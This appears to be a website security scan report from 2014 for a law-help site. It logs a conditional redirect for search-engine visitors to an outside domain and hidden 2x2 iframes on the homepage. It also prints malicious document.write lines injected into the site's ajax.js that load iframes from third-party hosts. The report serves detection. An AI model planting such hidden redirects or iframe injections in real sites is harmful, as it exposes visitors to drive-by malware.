Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.kialemonlawhelp.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.kialemonlawhelp.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 05 Oct 2014 11:45:30 GMT Location: http://guvenisg.com/czpn.html?h=819773 Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 362 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.kialemonlawhelp.com/ | 200 OK Content-Length: 36070 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://guvenisg.com/czpn.html?i=819773 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://guvenisg.com/czpn.html?i=819773> | ||
http://www.kialemonlawhelp.com/ajax.js | 200 OK Content-Length: 78609 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o] document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzpu.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://guvenisg.com/czpn.html?i=819773></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzpu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzpu.html> Hidden iFrame found. size: 2x2 src: http://serwis.redtulip.pl/ewpu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://serwis.redtulip.pl/ewpu.html> Hidden iFrame found. size: 2x2 src: http://guvenisg.com/czpn.html?i=819773 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://guvenisg.com/czpn.html?i=819773> | ||
http://www.kialemonlawhelp.com/test404page.js | 404 Not Found Content-Length: 471 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kialemonlawhelp.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kialemonlawhelp.com/
Result: kialemonlawhelp.com is not infected or malware details are not published yet.
Result: kialemonlawhelp.com is not infected or malware details are not published yet.